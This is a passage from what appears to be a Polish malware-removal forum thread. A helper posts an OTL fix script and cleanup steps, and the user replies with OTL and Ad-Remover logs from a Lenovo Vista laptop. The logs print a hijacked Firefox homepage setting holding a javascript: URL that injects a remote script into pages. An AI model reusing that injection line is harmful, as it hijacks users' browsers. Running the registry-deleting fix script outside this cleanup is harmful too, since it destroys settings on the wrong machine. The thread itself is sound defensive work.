Service; C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe [2007-08-09 722232] S4 TVT Scheduler;TVT Scheduler; c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe [2007-07-10 1126400] S4 tvtnetwk;tvtnetwk; C:\Program Files\Lenovo\Rescue and Recovery\ADM\IUService.exe [2007-07-10 45056] S4 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2007-04-10 386560] -----------------EOF----------------- [/log]
wirusolog commented on 18 July 2011 (edited)

[b]1.[/b] Run OTL and paste the following text into the [b]Własne opcje skanowania/Skrypt[/b] ("Custom scan options/Script") box:
[code]
:OTL
MsConfig - StartUpReg: BLOG - hkey= - key= - File not found
MsConfig - StartUpReg: ChomikBox - hkey= - key= - File not found
MsConfig - StartUpReg: HotKeysCmds - hkey= - key= - File not found
MsConfig - StartUpReg: IgfxTray - hkey= - key= - File not found
MsConfig - StartUpReg: Persistence - hkey= - key= - File not found
MsConfig - StartUpReg: PWMTRV - hkey= - key= - File not found
MsConfig - StartUpReg: Skype - hkey= - key= - File not found
MsConfig - StartUpReg: TpShocks - hkey= - key= - File not found
MsConfig - StartUpReg: TrackPointSrv - hkey= - key= - File not found
MsConfig - StartUpReg: Windows Defender - hkey= - key= - File not found
O4 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000..\Run: [Tok-Cirrhatus] File not found
O4 - HKLM..\Run: [] File not found
SRV - File not found [Disabled | Stopped] -- -- (Harmonogram automatycznej usługi LiveUpdate)
@Alternate Data Stream - 144 bytes -> C:\ProgramData\TEMP:CB0AACC9

:Reg
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2]

:Commands
[emptyflash]
[emptytemp]
[/code]
Click [b]Wykonaj skrypt[/b] ("Run script"). Confirm the computer restart.

[b]2.[/b] In Control Panel, under Add or Remove Programs, uninstall: [b]DAEMON Tools Toolbar[/b]

[b]3.[/b] Download [url=http://www.teamxscript.org/too/AD-R.exe][b][color=blue][u]Ad-Remover[/u][/color][/b][/url] and press [size=150][b]Clean[/b][/size] in it. Post the report from this tool.

[b]4.[/b] Then run OTL again, this time choosing the [b]Skanuj[/b] ("Scan") option. Post the new OTL logs plus the removal report.

So in the end you post:
[b][list]
[*]The OTL removal report (after the restart),
[*]The Ad-Remover cleaning report,
[*]The new OTL logs,
[/list][/b]
szefcu45 (author) commented on 23 July 2011 (edited)

Sorry for only replying now, but I had no chance to get to the laptop earlier. Daemon Tools Toolbar has been removed.

OTL after the restart (after running the script)
[log]
All processes killed
========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\BLOG\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\ChomikBox\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\HotKeysCmds\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\IgfxTray\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\Persistence\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\PWMTRV\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\Skype\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\TpShocks\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\TrackPointSrv\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\Windows Defender\ not found.
Registry value HKEY_USERS\S-1-5-21-3224443864-345457774-4058443421-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Tok-Cirrhatus not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\ not found.
Error: No service named Harmonogram automatycznej usługi LiveUpdate was found to stop!
Service\Driver key Harmonogram automatycznej usługi LiveUpdate not found.
Unable to delete ADS C:\ProgramData\TEMP:CB0AACC9 .
========== REGISTRY ==========
Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ deleted successfully.
========== COMMANDS ========== [EMPTYFLASH] User: All Users User: Default User: Default User User: Max ->Flash cache emptied: 0 bytes User: Public Total Flash Files Cleaned = 0,00 mb [EMPTYTEMP] User: All Users User: Default ->Temp folder emptied: 0 bytes ->Temporary Internet Files folder emptied: 0 bytes User: Default User ->Temp folder emptied: 0 bytes ->Temporary Internet Files folder emptied: 0 bytes User: Max ->Temp folder emptied: 666066771 bytes ->Temporary Internet Files folder emptied: 985118059 bytes ->FireFox cache emptied: 43681357 bytes ->Google Chrome cache emptied: 13931917 bytes ->Opera cache emptied: 240 bytes ->Flash cache emptied: 0 bytes User: Public %systemdrive% .tmp files removed: 0 bytes %systemroot% .tmp files removed: 0 bytes %systemroot%\System32 .tmp files removed: 0 bytes %systemroot%\System32\drivers .tmp files removed: 0 bytes Windows Temp folder emptied: 367610 bytes RecycleBin emptied: 5350629 bytes Total Files Cleaned = 1 635,00 mb OTL by OldTimer - Version 3.2.26.1 log created on 07232011_144428 Files\Folders moved on Reboot... Registry entries deleted on Reboot... [/log] Ad-Remover [log] ======= REPORT FROM AD-REMOVER 2.0.0.2,G | ONLY XP/VISTA/7 ======= Updated by TeamXscript on 12/04/11 Contact: AdRemover[DOT]contact[AT]gmail[DOT]com website: http://www.teamxscript.org C:\Program Files\Ad-Remover\main.exe (CLEAN [1]) -> Launched at 14:51:46 on 23/07/2011, Normal boot Microsoft® Windows Vista™ Home Premium (X86) Max@MAX-PC (LENOVO 7650E6G) ============== ACTION(S) ============== (!) -- Temporary files deleted. 
============== ADDITIONNAL SCAN ============== **** Mozilla Firefox Version [5.0.1 (pl)] **** Searchplugins\allegro-pl.xml (hxxp://www.allegro.pl/search.php?string={searchTerms}&sourceid=Mozilla-search) Searchplugins\fbc-pl.xml (hxxp://fbc.pionier.net.pl/owoc/results) Searchplugins\merlin-pl.xml (hxxp://www.merlin.com.pl/frontend/search?sourceid=Mozilla-search&fraza={searchTerms}&skad=crhhxmkohb) Searchplugins\pwn-pl.xml (hxxp://encyklopedia.pwn.pl/szukaj.php?co={searchTerms}) Searchplugins\wikipedia-pl.xml (hxxp://pl.wikipedia.org/wiki/Specjalna:Szukaj) Searchplugins\wp-pl.xml (hxxp://szukaj.wp.pl/szukaj.html?z=T&r=T&szukaj={searchTerms}) Components\browsercomps.dll (Mozilla Foundation) -- C:\Users\Max\AppData\Roaming\Mozilla\FireFox\Profiles\nx4xd3id.default -- Extensions\nostmp (?) Extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} (Adobe DLM (powered by getPlus(R))) Prefs.js - browser.download.lastDir, C:\\Users\\Max\\Desktop Prefs.js - browser.search.selectedEngine, DAEMON Search Prefs.js - browser.startup.homepage, hxxp://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.crea... 
Prefs.js - browser.startup.homepage_override.buildID, 20110707182747 Prefs.js - browser.startup.homepage_override.mstone, rv:5.0.1 ======================================== **** Internet Explorer Version [7.0.6000.16982] **** HKCU_Main|Default_Page_URL - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKCU_Main|Default_Search_URL - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKCU_Main|Search bar - hxxp://go.microsoft.com/fwlink/?linkid=54896 HKCU_Main|Start Page - hxxp://fr.msn.com/ HKLM_Main|Default_Page_URL - hxxp://go.microsoft.com/fwlink/?LinkId=54896 HKLM_Main|Default_Search_URL - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM_Main|Search bar - hxxp://search.msn.com/spbasic.htm HKLM_Main|Search Page - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM_Main|Start Page - hxxp://fr.msn.com/ HKCU_Toolbar\WebBrowser|{BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} (c:\Program Files\Windows Live Toolbar\msntb.dll) HKCU_Toolbar\WebBrowser|{32099AAC-C132-4136-9E9A-4E364A424E17} (x) HKLM_Toolbar|{90222687-F593-4738-B738-FBEE9C7B26DF} (C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll) HKLM_Toolbar|{BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} (c:\Program Files\Windows Live Toolbar\msntb.dll) HKLM_Toolbar|{8E5E2654-AD2D-48bf-AC2D-D17F00898D06} (C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll) HKLM_ElevationPolicy\{2c27f5f6-6501-467c-b313-cbe72d71a688} - C:\Program Files\BitSpirit\BitSpirit.exe (x) HKLM_Extensions\{0045D4BC-5189-4b67-969C-83BB1906C421} - "?" (?) HKLM_Extensions\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} - "?" (?) HKLM_Extensions\{CCA281CA-C863-46ef-9331-5C8D4460577F} - "@btrez.dll,-4015" (C:\Program Files\ThinkPad\Bluetooth Software\bt_cold_icon.ico) BHO\{1E8A6170-7264-4D0F-BEAE-D42A53123C75} - "?" 
(C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll) BHO\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - "SSVHelper Class" (C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll) BHO\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - "avast! WebRep" (C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll) BHO\{F040E541-A427-4CF7-85D8-75E3E0F476C5} - "CPwmIEBrowserHelper Object" (C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll) ======================================== C:\Program Files\Ad-Remover\Quarantine: 0 File(s) C:\Program Files\Ad-Remover\Backup: 15 File(s) C:\Ad-Report-CLEAN[1].txt - 23/07/2011 14:51:58 (4115 Byte(s)) End at: 14:52:56, 23/07/2011 ============== E.O.F ============== [/log]
OTL after cleaning with Ad-Remover
[log] OTL logfile created on: 2011-07-23 14:58:44 - Run 2 OTL by OldTimer - Version 3.2.26.1 Folder = C:\7'\naprawa\rejestr Windows Vista Home Premium Edition (Version = 6.0.6000) - Type = NTWorkstation Internet Explorer (Version = 7.0.6000.16982) Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd 1,99 Gb Total Physical Memory | 1,14 Gb Available Physical Memory | 57,16% Memory free 4,21 Gb Paging File | 3,39 Gb Available in Paging File | 80,51% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 142,25 Gb Total Space | 46,03 Gb Free Space | 32,36% Space Free | Partition Type: NTFS Drive D: | 472,11 Mb Total Space | 143,40 Mb Free Space | 30,37% Space Free | Partition Type: FAT Computer Name: MAX-PC | User Name: Max | Logged in as Administrator. 
Boot Mode: Normal | Scan Mode: Current user Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe PRC - [2011-07-04 13:43:54 | 003,493,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe PRC - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe PRC - [2011-05-18 18:32:40 | 001,233,856 | ---- | M] (Simply Super Software) -- C:\Program Files\Trojan Remover\Trjscan.exe PRC - [2011-04-12 13:45:20 | 000,527,371 | ---- | M] () -- C:\Program Files\Ad-Remover\main.exe PRC - [2011-04-04 15:24:56 | 002,923,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe PRC - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe [color=#E56717]========== Modules (SafeList) ==========[/color] MOD - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe MOD - [2011-07-04 13:43:51 | 000,199,792 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\snxhk.dll MOD - [2006-11-02 11:38:57 | 001,648,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.6000.16386_none_5d07289e07e1d100\comctl32.dll [color=#E56717]========== Win32 Services (SafeList) ==========[/color] SRV - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus) SRV - [2010-01-15 14:49:20 | 000,227,232 | ---- | M] (McAfee, Inc.) 
[Disabled | Stopped] -- C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe -- (McComponentHostService) SRV - [2008-11-10 22:07:42 | 000,265,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2008-11-10 14:37:17 | 001,174,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe -- (Symantec Core LC) SRV - [2008-01-29 17:38:32 | 000,583,048 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service) SRV - [2007-09-26 16:23:26 | 002,999,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_2.EXE -- (LiveUpdate) SRV - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () [Auto | Running] -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe -- (TVT Backup Protection Service) SRV - [2007-07-10 16:37:38 | 000,644,408 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe -- (ThinkVantage Registry Monitor Service) SRV - [2007-07-10 15:40:14 | 000,045,056 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\Rescue and Recovery\ADM\IUService.exe -- (tvtnetwk) SRV - [2007-07-05 16:48:54 | 000,206,120 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe -- (AcSvc) SRV - [2007-07-05 16:48:50 | 000,091,432 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe -- (AcPrfMgrSvc) SRV - [2007-06-07 17:43:46 | 000,013,312 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- c:\Program Files\Lenovo\System Update\SUService.exe -- (SUService) SRV - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) 
[Auto | Running] -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe -- (nmservice) SRV - [2007-03-14 16:42:22 | 000,012,800 | ---- | M] (Pure Networks, Inc.) [On_Demand | Stopped] -- C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe -- (nmraapache) SRV - [2007-03-02 07:07:28 | 000,055,936 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe -- (TPHKSVC) SRV - [2007-01-30 05:05:02 | 000,108,080 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Windows\System32\IPSSVC.EXE -- (IPSSVC) SRV - [2007-01-14 01:11:06 | 000,080,504 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Norton Internet Security\isPwdSvc.exe -- (ISPwdSvc) SRV - [2007-01-12 21:40:58 | 000,049,248 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe -- (comHost) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (LiveUpdate Notice Ex) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (CLTNetCnService) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccSetMgr) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccEvtMgr) SRV - [2007-01-05 02:19:28 | 000,047,712 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe -- (SymAppCore) SRV - [2006-11-15 17:20:46 | 000,634,988 | ---- | M] (Diskeeper Corporation) [Disabled | Stopped] -- C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe -- (Diskeeper) 
[color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV - [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx) DRV - [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswSP.sys -- (aswSP) DRV - [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi) DRV - [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr.sys -- (aswRdr) DRV - [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt) DRV - [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk) DRV - [2008-11-10 14:39:02 | 000,115,000 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SYMEVENT.SYS -- (SymEvent) DRV - [2008-05-02 10:58:14 | 000,008,064 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\usbser_lowerflt.sys -- (upperdev) DRV - [2008-05-02 10:58:12 | 000,017,536 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ccdcmb.sys -- (nmwcd) DRV - [2007-12-06 19:11:00 | 000,012,080 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\TPPWR32V.SYS -- (TPPWRIF) DRV - [2007-10-16 19:33:00 | 000,103,472 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\Apsx86.sys -- (Shockprf) DRV - [2007-10-16 19:32:00 | 000,019,504 | ---- | M] (Lenovo.) 
[Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\ApsHM86.sys -- (TPDIGIMN) DRV - [2007-05-22 16:59:38 | 000,030,336 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\tvti2c.sys -- (TVTI2C) DRV - [2007-05-22 09:59:34 | 000,021,376 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\psadd.sys -- (psadd) DRV - [2007-04-29 23:45:18 | 002,219,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw4v32.sys -- (NETw4v32) Sterownik karty Intel(R) DRV - [2007-04-27 08:29:54 | 000,215,040 | ---- | M] (Conexant Systems Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CHDARTN.sys -- (HdAudAddService) DRV - [2007-04-10 03:59:00 | 000,008,704 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio) DRV - [2007-01-11 20:22:20 | 000,276,792 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtspl.sys -- (SRTSPL) DRV - [2007-01-11 20:22:18 | 000,025,400 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\drivers\srtspx.sys -- (SRTSPX) DRV - [2007-01-11 20:22:14 | 000,247,608 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtsp.sys -- (SRTSP) DRV - [2007-01-10 03:00:00 | 000,833,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVEX15.SYS -- (NAVEX15) DRV - [2007-01-10 03:00:00 | 000,387,384 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl) DRV - [2007-01-10 03:00:00 | 000,102,712 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- 
(EraserUtilRebootDrv) DRV - [2007-01-10 03:00:00 | 000,080,408 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVENG.SYS -- (NAVENG) DRV - [2007-01-09 16:32:14 | 000,191,544 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\Drivers\SYMTDI.SYS -- (SYMTDI) DRV - [2007-01-09 16:32:14 | 000,145,976 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMFW.SYS -- (SYMFW) DRV - [2007-01-09 16:32:14 | 000,040,120 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMIDS.SYS -- (SYMIDS) DRV - [2007-01-09 16:32:14 | 000,038,200 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMNDISV.SYS -- (SYMNDISV) DRV - [2007-01-09 16:32:14 | 000,027,576 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMREDRV.SYS -- (SYMREDRV) DRV - [2007-01-09 16:32:14 | 000,012,984 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMDNS.SYS -- (SYMDNS) DRV - [2007-01-03 09:05:02 | 000,417,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys -- (SPBBCDrv) DRV - [2006-12-28 00:48:26 | 000,212,280 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\ProgramData\Symantec\Definitions\SymcData\idsdefs\20070108.003\IDSvix86.sys -- (IDSvix86) DRV - [2006-11-06 10:24:56 | 000,012,080 | ---- | M] (Lenovo Group Limited) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\PROCDD.SYS -- (PROCDD) DRV - [2006-11-02 09:30:54 | 001,781,760 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NETw3v32.sys -- (NETw3v32) Sterownik karty Intel(R) DRV - [2006-08-30 12:04:04 | 000,013,744 | ---- | M] (Lenovo Group Limited) [Kernel 
| System | Running] -- C:\Windows\System32\drivers\smiif32.sys -- (lenovo.smi) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search bar = http://search.msn.com/spbasic.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/ IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = [Binary data over 100 bytes] IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/ IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.selectedEngine: "DAEMON Search" FF - prefs.js..browser.startup.homepage: "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script'script.id='stylujDodajObrazki';script.type='text/javascript';script.src='http://stylistki.pl/scripts/dodajObrazki.js?'+(new%20Date()).getTime();o.body.appendChild(script);}a(document);})();"); FF - prefs.js..extensions.enabledItems: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.3.6 FF - prefs.js..extensions.enabledItems: {E2883E8F-472F-4fb0-9522-AC9BF37916A7}:1.6.2.103 FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550 FF - prefs.js..extensions.enabledItems: wrc@avast.com:6.0.1203 FF - prefs.js..extensions.enabledItems: DTToolbar@toolbarnet.com:1.1.4.0024 FF - prefs.js..network.proxy.type: 0 FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32.dll () FF - 
HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2011-07-08 14:35:29 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011-07-12 14:30:45 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011-07-12 14:22:06 | 000,000,000 | ---D | M] [2011-04-02 18:52:42 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Extensions [2011-07-23 14:51:15 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions [2011-04-30 22:03:44 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} [2011-06-08 22:14:38 | 000,000,000 | ---D | M] (Adobe DLM (powered by getPlus(R))) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2011-07-12 14:30:53 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\nostmp [2011-07-11 13:14:03 | 000,002,055 | ---- | M] () -- C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\searchplugins\daemon-search.xml [2011-07-12 14:30:44 | 000,000,000 | ---D | M] (No name 
